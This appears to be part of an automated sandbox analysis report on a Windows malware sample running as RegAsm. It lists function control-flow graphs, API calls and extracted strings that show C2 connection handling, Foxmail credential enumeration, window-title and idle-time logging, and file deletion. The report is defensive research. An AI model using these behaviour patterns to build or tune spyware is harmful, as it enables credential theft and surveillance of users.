                                                                                                                                                                                                  control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1093 412e43-412e5f call 401f04 call 41c516 1091->1093 1092->1093 1100 412e61-412e73 call 401f04 DeleteFileW 1093->1100 1101 412e79-412e7b 1093->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1107 412e99-412eab call 406b63 1103->1107 1104->1103 1106 412e81-412e86 1104->1106 1106->1103 1106->1107 1110 412f01-412f20 call 401f09 * 3 1107->1110 1111 412ead-412ebb call 406b63 1107->1111 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ed8 Sleep call 401f09 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1127 412edd-412ef9 call 401f09 * 2 1123->1127 1127->978 1137 412eff 1127->1137 1137->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63841986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                                                                                                                                                                  • API String ID: 1223786279-2576077980
                                                                                                                                                                                                  • Opcode ID: eaa2c7ded2fb993fb69df274429c638ebd8ce54d64ed8dcd9df39e74ccc7a972
                                                                                                                                                                                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaa2c7ded2fb993fb69df274429c638ebd8ce54d64ed8dcd9df39e74ccc7a972
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                                                                                                                                                  Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                    • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                    • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                    • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                  • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                  • API String ID: 672098462-2938083778
                                                                                                                                                                                                  • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                  • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                                                                                  Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1308 414f0a-414f0d 1295->1308 1309 414ebd-414ec7 GetProcAddress 1295->1309 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1303 414ed4-414ee5 GetProcAddress 1300->1303 1305 414ee7-414eeb 1303->1305 1306 414eef-414ef2 FreeLibrary 1303->1306 1305->1303 1310 414eed 1305->1310 1307 414ef4-414ef6 1306->1307 1307->1308 1311 414ef8-414f08 1307->1311 1308->1289 1312 414ec9-414ecc FreeLibrary 1309->1312 1313 414ece-414ed0 1309->1313 1310->1307 1311->1308 1311->1311 1312->1313 1313->1300 1313->1308
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                                                  • API String ID: 2490988753-744132762
                                                                                                                                                                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                                                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                                                                                                                                  Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                                                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                                                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                                                                                                                                  • API String ID: 3795512280-1152054767
                                                                                                                                                                                                  • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                                                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                                                                                                                                                  Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1412 4048c8-4048e8 connect 1413 404a1b-404a1f 1412->1413 1414 4048ee-4048f1 1412->1414 1417 404a21-404a2f WSAGetLastError 1413->1417 1418 404a97 1413->1418 1415 404a17-404a19 1414->1415 1416 4048f7-4048fa 1414->1416 1419 404a99-404a9e 1415->1419 1420 404926-404930 call 420cf1 1416->1420 1421 4048fc-404923 call 40531e call 402093 call 41b580 1416->1421 1417->1418 1422 404a31-404a34 1417->1422 1418->1419 1431 404941-40494e call 420f20 1420->1431 1432 404932-40493c 1420->1432 1421->1420 1425 404a71-404a76 1422->1425 1426 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1422->1426 1428 404a7b-404a94 call 402093 * 2 call 41b580 1425->1428 1426->1418 1428->1418 1445 404950-404973 call 402093 * 2 call 41b580 1431->1445 1446 404987-404992 call 421ad1 1431->1446 1432->1428 1475 404976-404982 call 420d31 1445->1475 1458 4049c4-4049d1 call 420e97 1446->1458 1459 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1446->1459 1469 4049d3-4049f6 call 402093 * 2 call 41b580 1458->1469 1470 4049f9-404a14 CreateEventW * 2 1458->1470 1459->1475 1469->1470 1470->1415 1475->1418
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • connect.WS2_32(FFFFFFFF,021C4988,00000010), ref: 004048E0
                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                                  • API String ID: 994465650-2151626615
                                                                                                                                                                                                  • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                                                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                                                                                                                                                  Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                                  • API String ID: 911427763-3954389425
                                                                                                                                                                                                  • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                                                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                                                                                                                                                                  Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1567 40da6f-40da94 call 401f86 1570 40da9a 1567->1570 1571 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1567->1571 1572 40dae0-40dae7 call 41c048 1570->1572 1573 40daa1-40daa6 1570->1573 1574 40db93-40db98 1570->1574 1575 40dad6-40dadb 1570->1575 1576 40dba9 1570->1576 1577 40db9a-40dba7 call 43c11f 1570->1577 1578 40daab-40dab9 call 41b645 call 401f13 1570->1578 1579 40dacc-40dad1 1570->1579 1580 40db8c-40db91 1570->1580 1593 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1572->1593 1594 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1572->1594 1583 40dbae call 43c11f 1573->1583 1574->1583 1575->1583 1576->1583 1577->1576 1595 40dbb4-40dbb9 call 409092 1577->1595 1601 40dabe 1578->1601 1579->1583 1580->1583 1596 40dbb3 1583->1596 1606 40dac2-40dac7 call 401f09 1593->1606 1594->1601 1595->1571 1596->1595 1601->1606 1606->1571
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LongNamePath
                                                                                                                                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                                  • API String ID: 82841172-425784914
                                                                                                                                                                                                  • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                                                                                                                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                                                                                                                                                  Function 0044ACC9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1649 44acc9-44ace2 1650 44ace4-44acf4 call 4467e6 1649->1650 1651 44acf8-44acfd 1649->1651 1650->1651 1658 44acf6 1650->1658 1652 44acff-44ad07 1651->1652 1653 44ad0a-44ad2e MultiByteToWideChar 1651->1653 1652->1653 1656 44ad34-44ad40 1653->1656 1657 44aec1-44aed4 call 43502b 1653->1657 1659 44ad94 1656->1659 1660 44ad42-44ad53 1656->1660 1658->1651 1662 44ad96-44ad98 1659->1662 1663 44ad55-44ad64 call 457210 1660->1663 1664 44ad72-44ad83 call 4461b8 1660->1664 1666 44aeb6 1662->1666 1667 44ad9e-44adb1 MultiByteToWideChar 1662->1667 1663->1666 1676 44ad6a-44ad70 1663->1676 1664->1666 1677 44ad89 1664->1677 1671 44aeb8-44aebf call 435ecd 1666->1671 1667->1666 1670 44adb7-44adc9 call 448c33 1667->1670 1678 44adce-44add2 1670->1678 1671->1657 1680 44ad8f-44ad92 1676->1680 1677->1680 1678->1666 1681 44add8-44addf 1678->1681 1680->1662 1682 44ade1-44ade6 1681->1682 1683 44ae19-44ae25 1681->1683 1682->1671 1684 44adec-44adee 1682->1684 1685 44ae27-44ae38 1683->1685 1686 44ae71 1683->1686 1684->1666 1687 44adf4-44ae0e call 448c33 1684->1687 1689 44ae53-44ae64 call 4461b8 1685->1689 1690 44ae3a-44ae49 call 457210 1685->1690 1688 44ae73-44ae75 1686->1688 1687->1671 1704 44ae14 1687->1704 1694 44ae77-44ae90 call 448c33 1688->1694 1695 44aeaf-44aeb5 call 435ecd 1688->1695 1689->1695 1703 44ae66 1689->1703 1690->1695 1701 44ae4b-44ae51 1690->1701 1694->1695 1707 44ae92-44ae99 1694->1707 1695->1666 1706 44ae6c-44ae6f 1701->1706 1703->1706 1704->1666 1706->1688 1708 44aed5-44aedb 1707->1708 1709 44ae9b-44ae9c 1707->1709 1710 44ae9d-44aead WideCharToMultiByte 1708->1710 1709->1710 1710->1695 1711 44aedd-44aee4 call 435ecd 1710->1711 1711->1671
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 3864826663-2084328917
                                                                                                                                                                                                  • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                                                                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
